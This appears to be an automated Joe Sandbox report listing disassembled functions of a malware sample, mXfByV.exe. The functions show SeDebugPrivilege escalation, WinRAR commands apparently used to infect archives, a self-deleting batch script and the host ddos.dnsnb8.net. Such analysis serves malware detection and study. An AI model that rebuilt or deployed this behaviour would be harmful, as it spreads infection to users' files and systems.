Instruction Fuzzy Hash: 88110475540224BBCF206BA0AD4FFDB3E6FEF13B61F101215F209992A0CA718980CBB1

Function 00641000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGd,http://%s:%d/%s/%s,006410E8,?), ref: 00641018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 00641029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00641038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0064104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00641075
CloseHandle.KERNEL32(?), ref: 0064108B
CloseHandle.KERNEL32(00000000), ref: 0064108E

Strings

HGd, xrefs: 00641001
ddos.dnsnb8.net, xrefs: 00641026
http://%s:%d/%s/%s, xrefs: 00641000

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HGd$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-1949565679
Opcode ID: 748bbf452d2ba31016b9ad16ad137340e0cdf81f31c99ca61530037e65a7390a
Instruction ID: 40ffb1ad3f828c43a3b036503091745c5d014a6479c5cc6e10b6b8362aa0d13f
Opcode Fuzzy Hash: 748bbf452d2ba31016b9ad16ad137340e0cdf81f31c99ca61530037e65a7390a
Instruction Fuzzy Hash: 6301967510035CBFE7306F609C88E6BBBAEDB45B99F004629F245A6690DA705E848B70

Function 00642C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00642C57

Part of subcall function 00641973: PathFileExistsA.SHLWAPI(\Nd`Nd,00000000,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 00641992
Part of subcall function 00641973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006419BA
Part of subcall function 00641973: Sleep.KERNEL32(00000064), ref: 006419C6
Part of subcall function 00641973: wsprintfA.USER32 ref: 006419EC
Part of subcall function 00641973: CopyFileA.KERNEL32(?,?,00000000), ref: 00641A00
Part of subcall function 00641973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00641A1E
Part of subcall function 00641973: GetFileSize.KERNEL32(?,00000000), ref: 00641A2C
Part of subcall function 00641973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00641A46
Part of subcall function 00641973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00641A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00642C99
WaitForMultipleObjects.KERNEL32(00000001,006416BA,00000001,000000FF,?,006416BA,00000000), ref: 00642CAC
VirtualFree.KERNEL32(01240000,00000000,00008000,C:\Users\user\AppData\Local\Temp\mXfByV.exe,00644E5C,00644E60,?,006416BA,00000000), ref: 00642CC2

Strings

C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 00642C69

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe
API String ID: 2042498389-246659021
Opcode ID: f4804caf46bc5d36a751ea49074f8b32c18418a173807b52b2117334e3a91157
Instruction ID: 0ee2ab0bce54c88ddecd603a4bdfa02b7dbf6986f9d79f1c599b783969af44ba
Opcode Fuzzy Hash: f4804caf46bc5d36a751ea49074f8b32c18418a173807b52b2117334e3a91157
Instruction Fuzzy Hash: 8A01DF756412207AD750ABA5AC5AFEF7FAEEF02B20F604124B604D62C1DAA09A40C3E0

Function 006414E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00641504
VirtualQuery.KERNEL32(006414E1,?,0000001C), ref: 00641525
ExitProcess.KERNEL32 ref: 0064157A

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 34df2f8ccfd51a8ab7ac86234e6c83c15af914ee0f96ce8e844e87fa9f0954b6
Instruction ID: 8f8a424a31634572d18a7c568c69407d8be30e5eaa26d3d02e3d1dc11ee58fad
Opcode Fuzzy Hash: 34df2f8ccfd51a8ab7ac86234e6c83c15af914ee0f96ce8e844e87fa9f0954b6
Instruction Fuzzy Hash: EC1182B9D00214DFCB14EFA5A8867FD77BEEB86750B10613BF412DA250D7308981DB50

Function 00641915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00641933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00641947

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 3182dff8775149e897b1d6fa8d6d6121ceb5f2f827ade6f490ff56aeb443cf81
Instruction ID: 8a37f73f8b6fb9cfb7dd7ac8953c8ae4aa3b2124ccb7f1c32bd8fb38749107a8
Opcode Fuzzy Hash: 3182dff8775149e897b1d6fa8d6d6121ceb5f2f827ade6f490ff56aeb443cf81
Instruction Fuzzy Hash: E2F06836200209ABD720DE26DC04BEB77AEAB52761F10953AF516D5150E730E685CBB0

Function 00646159 Relevance: 2.6, APIs: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006460DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00646189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006461A5

Memory Dump Source

Source File: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 0bec5fff425cea0965e71151efcc64b72201ad3484e42206c28093458ce37e82
Instruction ID: ddfec09e1296a5f9dbbe4ceadfcd03c75eafcc1c363635d61e6fddc8d4c6eebb
Opcode Fuzzy Hash: 0bec5fff425cea0965e71151efcc64b72201ad3484e42206c28093458ce37e82
Instruction Fuzzy Hash: DD118F71A00649DFCF358E58CC817DE37A2FF06701F694029EE4A6B391DAB16A81CB95

Non-executed Functions

Function 0064119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,?,?,006413EF), ref: 006411AB
OpenProcessToken.ADVAPI32(00000000,00000028,006413EF,?,?,?,?,?,?,006413EF), ref: 006411BB
AdjustTokenPrivileges.ADVAPI32(006413EF,00000000,?,00000010,00000000,00000000), ref: 006411EB
CloseHandle.KERNEL32(006413EF), ref: 006411FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,006413EF), ref: 00641203

Strings

C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 006411A5

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe
API String ID: 75692138-246659021
Opcode ID: cf70b1576d95e39c13cb1bb78f13774b3dfa77575267ed07b19a62f8eccd1512
Instruction ID: 62f8c6e87515264ba9a1be5dbd40fc04349099933bbb10bbc43019f9cafb1a86
Opcode Fuzzy Hash: cf70b1576d95e39c13cb1bb78f13774b3dfa77575267ed07b19a62f8eccd1512
Instruction Fuzzy Hash: 440124B9900208EFDB00DFE4DD89AAEBBBAFB05704F204569E606A2250D7709F849B50

Function 0064139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 006413BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006413DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00641448

Part of subcall function 0064119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,?,?,006413EF), ref: 006411AB
Part of subcall function 0064119F: OpenProcessToken.ADVAPI32(00000000,00000028,006413EF,?,?,?,?,?,?,006413EF), ref: 006411BB
Part of subcall function 0064119F: AdjustTokenPrivileges.ADVAPI32(006413EF,00000000,?,00000010,00000000,00000000), ref: 006411EB
Part of subcall function 0064119F: CloseHandle.KERNEL32(006413EF), ref: 006411FA
Part of subcall function 0064119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006413EF), ref: 00641203

Strings

C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 006413A8
SeDebugPrivilege, xrefs: 006413D3

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe$SeDebugPrivilege
API String ID: 4123949106-703880843
Opcode ID: a95c137bca36f06fe03303fee213202ec6d742691140cff451fabae0b9d3ea5d
Instruction ID: b9ac7a0323c1491a3e904bbef876286f51fed5d755cc186a458c8c5ad57bdb77
Opcode Fuzzy Hash: a95c137bca36f06fe03303fee213202ec6d742691140cff451fabae0b9d3ea5d
Instruction Fuzzy Hash: 2F315271D00219EADF61DFA5CC45FEEBBBAEB86704F204169E504BB281D7709E85CB60

Function 00646D00 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 9140eeb8a3c074550536cedc2c915dcccf637867eb044d502bc364ee3aa460f1
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: EC81B171204B418FC728CF29C8906AABBE3EFD6314F14896DE4EA87791D734A849CB45

Function 0064239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 006423CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00642464
GetFileSize.KERNEL32(00000000,00000000), ref: 00642472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 006424A8
memset.MSVCRT ref: 006424B9
strrchr.MSVCRT ref: 006424C9
wsprintfA.USER32 ref: 006424DE
strrchr.MSVCRT ref: 006424ED
memset.MSVCRT ref: 006424F2
memset.MSVCRT ref: 00642505
wsprintfA.USER32 ref: 00642524
Sleep.KERNEL32(000007D0), ref: 00642535
Sleep.KERNEL32(000007D0), ref: 0064255D
memset.MSVCRT ref: 0064256E
wsprintfA.USER32 ref: 00642585
memset.MSVCRT ref: 006425A6
wsprintfA.USER32 ref: 006425CA
Sleep.KERNEL32(000007D0), ref: 006425D0
Sleep.KERNEL32(000007D0,?,?), ref: 006425E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006425FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00642611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00642642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0064265B
SetEndOfFile.KERNEL32 ref: 0064266D
CloseHandle.KERNEL32(00000000), ref: 00642676
RemoveDirectoryA.KERNEL32(?), ref: 00642681

Strings

%s%s, xrefs: 006424D8
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 006425C4
%s X -ibck "%s" "%s\", xrefs: 0064251E
%s\, xrefs: 0064257F
-ibck, xrefs: 006425BA
C:\Users\user\AppData\Local\Temp\, xrefs: 006423B1, 006423B6, 006424CD

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-774930870
Opcode ID: 1851913b93b2c186b96a837ac78d3da39d39ede6116d0b587150ecc9332b5eb0
Instruction ID: be6ccd9bbca8cfb2dc653d9ff7daa7b0c253e061e6927752f2fcf476961a7094
Opcode Fuzzy Hash: 1851913b93b2c186b96a837ac78d3da39d39ede6116d0b587150ecc9332b5eb0
Instruction Fuzzy Hash: 1081A0B1504315ABD710EF60EC89FAB7BEEFB89B04F50091AF644D2290D770DA498B66

Function 0064274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00642766
memset.MSVCRT ref: 00642774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00642787
wsprintfA.USER32 ref: 006427AB

Part of subcall function 0064185B: GetSystemTimeAsFileTime.KERNEL32(00641F92,00000000,?,00000000,?,?,?,00641F92,?,00000000,00000002), ref: 00641867
Part of subcall function 0064185B: srand.MSVCRT ref: 00641878
Part of subcall function 0064185B: rand.MSVCRT ref: 00641880
Part of subcall function 0064185B: srand.MSVCRT ref: 00641890
Part of subcall function 0064185B: rand.MSVCRT ref: 00641894

wsprintfA.USER32 ref: 006427C6
CopyFileA.KERNEL32(?,00644C80,00000000), ref: 006427D4
wsprintfA.USER32 ref: 006427F4

Part of subcall function 00641973: PathFileExistsA.SHLWAPI(\Nd`Nd,00000000,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 00641992
Part of subcall function 00641973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006419BA
Part of subcall function 00641973: Sleep.KERNEL32(00000064), ref: 006419C6
Part of subcall function 00641973: wsprintfA.USER32 ref: 006419EC
Part of subcall function 00641973: CopyFileA.KERNEL32(?,?,00000000), ref: 00641A00
Part of subcall function 00641973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00641A1E
Part of subcall function 00641973: GetFileSize.KERNEL32(?,00000000), ref: 00641A2C
Part of subcall function 00641973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00641A46
Part of subcall function 00641973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00641A65

DeleteFileA.KERNEL32(?,?,00644E54,00644E58), ref: 0064281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00644E54,00644E58), ref: 00642832

Strings

%s%s, xrefs: 006427A5
\WinRAR\Rar.exe, xrefs: 00642793
c_31892.nls, xrefs: 006427DE
C:\Windows\system32, xrefs: 006427E3
C:\Users\user\AppData\Local\Temp\, xrefs: 006427B6
%s\%s, xrefs: 006427EE
%s%.8x.exe, xrefs: 006427BB

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3099098879
Opcode ID: 39f24e5f5140883418f13340403751a754724cfdd35dea3405b3d4281b05f820
Instruction ID: f8c0b6130df711809aac5372c1ff93c04e0d3374d4170fb43b1b3ee5ed3049cb
Opcode Fuzzy Hash: 39f24e5f5140883418f13340403751a754724cfdd35dea3405b3d4281b05f820
Instruction Fuzzy Hash: 022196B6D4022C7BDB10EBA49CCAFDB776EEB05744F4105A1B644E2141E6B0DF848AB4

Function 00641581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0064185B: GetSystemTimeAsFileTime.KERNEL32(00641F92,00000000,?,00000000,?,?,?,00641F92,?,00000000,00000002), ref: 00641867
Part of subcall function 0064185B: srand.MSVCRT ref: 00641878
Part of subcall function 0064185B: rand.MSVCRT ref: 00641880
Part of subcall function 0064185B: srand.MSVCRT ref: 00641890
Part of subcall function 0064185B: rand.MSVCRT ref: 00641894

wsprintfA.USER32 ref: 006415AA
wsprintfA.USER32 ref: 006415C6
lstrlen.KERNEL32(?), ref: 006415D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006415EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00641609
CloseHandle.KERNEL32(00000000), ref: 00641612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0064162D

Strings

%s%.8x.bat, xrefs: 006415A4
C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 0064158A, 006415B3, 006415B8, 006415B9
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 006415C0
open, xrefs: 00641627
C:\Users\user\AppData\Local\Temp\, xrefs: 00641599

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\mXfByV.exe$open
API String ID: 617340118-2700022502
Opcode ID: a1232c28eaa3b826a8445e6f51daaaa689747ab8d2467bb769dcdc31b1851038
Instruction ID: ab772d58c2dd8f72590635b0638233ebc84fcd8882f17987bc4283ba0d729fd9
Opcode Fuzzy Hash: a1232c28eaa3b826a8445e6f51daaaa689747ab8d2467bb769dcdc31b1851038
Instruction Fuzzy Hash: B8117376A01138BFD72097A49C89EEB7B6EDF5A750F010151F549E3240DA709BC48BB0

Function 0064120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00641400), ref: 00641226
GetProcAddress.KERNEL32(00000000), ref: 0064122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00641400), ref: 0064123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00641400), ref: 00641250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,00641400), ref: 0064129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,00641400), ref: 006412B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\mXfByV.exe,?,?,?,?,00641400), ref: 006412F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00641400), ref: 0064130A

Strings

ZwQuerySystemInformation, xrefs: 00641212
C:\Users\user\AppData\Local\Temp\mXfByV.exe, xrefs: 00641262
ntdll.dll, xrefs: 00641219

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-2000334012
Opcode ID: e1718ca142d20c645c43567560112469e97744ee5e005ca05b6994294e11cff1
Instruction ID: 9d71babf264dafe4d4430a490edeb82c50b935e32e6cda6ed892003f00e3f7ea
Opcode Fuzzy Hash: e1718ca142d20c645c43567560112469e97744ee5e005ca05b6994294e11cff1
Instruction Fuzzy Hash: 7A21D531605321ABD7209F65CC08BABBAAAFB87F00F100A19F545EB340D7B0DAC4C7A5

Function 0064189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 006418B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 006418D3
CloseHandle.KERNEL32(I%d), ref: 006418E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 006418F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00641901
CloseHandle.KERNEL32(?), ref: 0064190A

Strings

I%d, xrefs: 006418E0

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%d
API String ID: 876959470-572922619
Opcode ID: af8d0d7a8f8f7e8737f4c501911e999197b6c2945cb57d7cc08d2697f89ba24e
Instruction ID: 3108bbf25e3957ae98d625b056a47ec5c8d23b6306ef67d5e43b962562177776
Opcode Fuzzy Hash: af8d0d7a8f8f7e8737f4c501911e999197b6c2945cb57d7cc08d2697f89ba24e
Instruction Fuzzy Hash: 40014F76901128BBCB21ABD6DC48DDFBF7EFF86770F104121FA15A52A0D6714A58CBA0

Function 00642692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,006429DB,?,00000001), ref: 006426A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,006429DB,?,00000001), ref: 006426B5
lstrlen.KERNEL32(?), ref: 006426C4
??2@YAPAXI@Z.MSVCRT(-00000005), ref: 006426CE
lstrcpy.KERNEL32(00000004,?), ref: 006426E3
lstrcpy.KERNEL32(?,00000004), ref: 0064271F
??3@YAXPAX@Z.MSVCRT(00000000), ref: 0064272D
SetEvent.KERNEL32 ref: 0064273C

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
